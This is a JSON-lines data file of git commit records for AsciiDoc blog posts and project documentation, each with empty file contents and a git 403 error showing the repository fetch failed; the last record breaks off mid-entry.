{"commit":"7fdbea9fc20812f6b600f4db57481ad67cc759e5","subject":"Update 2015-09-24-AS.adoc","message":"Update 2015-09-24-AS.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-24-AS.adoc","new_file":"_posts\/2015-09-24-AS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2da3d1151d01ddec6ada437c44dc045619aacab2","subject":"Update 2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","message":"Update 2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","new_file":"_posts\/2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66202dcf51bdef69e1fdacf12cfb6980c3e7e4c9","subject":"Include missing field-caps docs in search","message":"Include missing field-caps docs in search\n","repos":"masaruh\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,jimczi\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,jimczi\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,mohit\/elas
ticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/search.asciidoc","new_file":"docs\/reference\/search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2429281c4204af3745b805c56233c24cda5e4d4b","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 
2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a43f9f3f3cffe8d74bf271cf9ba120d86c178b27","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d997b702686874f4fea2c6d3dabef4d602d5c0d","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"620aba1ee5fe5eaec0aeb756ff53f1dd30f9e421","subject":"y2b create post Horse Heads \\u0026 RAM Upgrades?! (Deal Therapy)","message":"y2b create post Horse Heads \\u0026 RAM Upgrades?! 
(Deal Therapy)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-25-Horse-Heads-u0026-RAM-Upgrades-Deal-Therapy.adoc","new_file":"_posts\/2013-04-25-Horse-Heads-u0026-RAM-Upgrades-Deal-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dca63d778a9cb2e90d78af48ea97595607fc517","subject":"docs: KUDU-2411: Document the binary test jar","message":"docs: KUDU-2411: Document the binary test jar\n\nThis patch adds documentation for how to use the Kudu binary test jar.\n\nChange-Id: I8189f1703626587a5313d8c1fb11d046455d9f39\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12685\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ba5fd743b6f887e99f5eee60e62ccc8a58a21f9","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/ukraine.adoc","new_file":"content\/writings\/ukraine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"97d12a5c9c387b85cf4d9f2c903e929c9d024225","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ca62fad91b961f06014d672a8defe5aa8262d5","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"91d0e87414cf2df47b515578d6aaa58eeb860c87","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bab3719279f7cc630e3c808afc246e2a0a6ffd06","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d166d0baf9f2562bb93c79186281682e28103c56","subject":"y2b create post Goodbye iPhone","message":"y2b create post Goodbye iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-15-Goodbye-iPhone.adoc","new_file":"_posts\/2014-09-15-Goodbye-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cf8a5302597efdb2e9b9de5f931f974f9056a69","subject":"Update 2015-07-31-Hitachi-Intern.adoc","message":"Update 2015-07-31-Hitachi-Intern.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-31-Hitachi-Intern.adoc","new_file":"_posts\/2015-07-31-Hitachi-Intern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a6f1f5f8438500a68a5c7c4fec3f4f375c66d3","subject":"y2b create post Just Add Water?","message":"y2b create post Just Add Water?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-15-Just-Add-Water.adoc","new_file":"_posts\/2016-04-15-Just-Add-Water.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea77d63eb7d9b9263c1644ece5697f2920c5105","subject":"add a browser_tools file","message":"add a browser_tools file\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Browser_Tools.adoc","new_file":"Browser_Tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 
403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"0979aee6de34824f444642373db757dda7237df2","subject":"Update 2015-07-14-Test-Post.adoc","message":"Update 2015-07-14-Test-Post.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-14-Test-Post.adoc","new_file":"_posts\/2015-07-14-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bcf945a6e2cd900305383edf50a4804e241f097","subject":"Update 2015-11-15-Comunidad.adoc","message":"Update 2015-11-15-Comunidad.adoc","repos":"lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io","old_file":"_posts\/2015-11-15-Comunidad.adoc","new_file":"_posts\/2015-11-15-Comunidad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasferraro\/lucasferraro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef9240944c4afc79e87f1bee5373978a4b1bbd7e","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2a7fa4e5724216ae6c45414ec84d2adf171517e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13dd96c227766c0f2cda012cf7fd9c4cc7a38179","subject":"Delete Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","message":"Delete Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9257b1675569dc31070f482d106ae0529b14c38","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 
2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16d2c72459a8a1b30d3b25074fef84114aac218b","subject":"Update 2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","message":"Update 2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","repos":"rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io","old_file":"_posts\/2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","new_file":"_posts\/2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdspring1\/rdspring1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b60f601290e95c401fc8f4b9e9a9f0bd5c458e7","subject":"Update 2016-01-12-This-is-a-test-post-Number-1.adoc","message":"Update 2016-01-12-This-is-a-test-post-Number-1.adoc","repos":"vadio\/vadio.github.io,vadio\/vadio.github.io,vadio\/vadio.github.io","old_file":"_posts\/2016-01-12-This-is-a-test-post-Number-1.adoc","new_file":"_posts\/2016-01-12-This-is-a-test-post-Number-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vadio\/vadio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e32902bce35f0c769c32d52f390070ca6208ea3","subject":"Update 2016-03-01-More-magic-coming-to-MyMagic.adoc","message":"Update 2016-03-01-More-magic-coming-to-MyMagic.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-01-More-magic-coming-to-MyMagic.adoc","new_file":"_posts\/2016-03-01-More-magic-coming-to-MyMagic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"039e9c035f52769eebdda31c9c6adc4343456943","subject":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","message":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7e9d81073ad90ac635fe50ff1beb96b59951f3a","subject":"userdocumentation and extractes set version api","message":"userdocumentation and extractes set version 
api\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-server\/src\/main\/docs\/serverInstallation.adoc","new_file":"leguan-server\/src\/main\/docs\/serverInstallation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"068e6a28bbb3616aba3ccb4a42555532bd0e6e0b","subject":"job #12373 add implementation note","message":"job #12373 add implementation note\n","repos":"xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12373_disappearing_masl.int.adoc","new_file":"doc-bridgepoint\/notes\/12373_disappearing_masl.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"929c650601a4635c2ef7c8c374820df1d6acff6e","subject":"Add note about JDK9","message":"Add note about JDK9\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f913476640152b1774b81f3a2fa36a9552c8ca8a","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8848d7ace48dc61acc1bd0e64b59de3733c9a86","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf05bbd719c9e3faaee03908616f2183cfc828bc","subject":"Update 2016-08-09.adoc","message":"Update 
2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09.adoc","new_file":"_posts\/2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aff7292002b25686e2f8e3f44d3ec1aa0fd9d55","subject":"y2b create post I've Never Seen Anything Like It...","message":"y2b create post I've Never Seen Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-05-Ive-Never-Seen-Anything-Like-It.adoc","new_file":"_posts\/2017-02-05-Ive-Never-Seen-Anything-Like-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f9f67c80eafd4556cf2e6850bf52cf61fc35105","subject":"y2b create post Note 5 - S Pen Rant!","message":"y2b create post Note 5 - S Pen Rant!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-23-Note-5--S-Pen-Rant.adoc","new_file":"_posts\/2015-08-23-Note-5--S-Pen-Rant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea8770261d57279332a0138c6b97eab72ad6ba34","subject":"Renamed '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc' to '_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc'","message":"Renamed '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc' to '_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"050fbc8f3d9d67cfaf355f9e047d332f1ed04285","subject":"Docs: Fix description of percentile ranks example example (#31652)","message":"Docs: Fix description of percentile ranks example example 
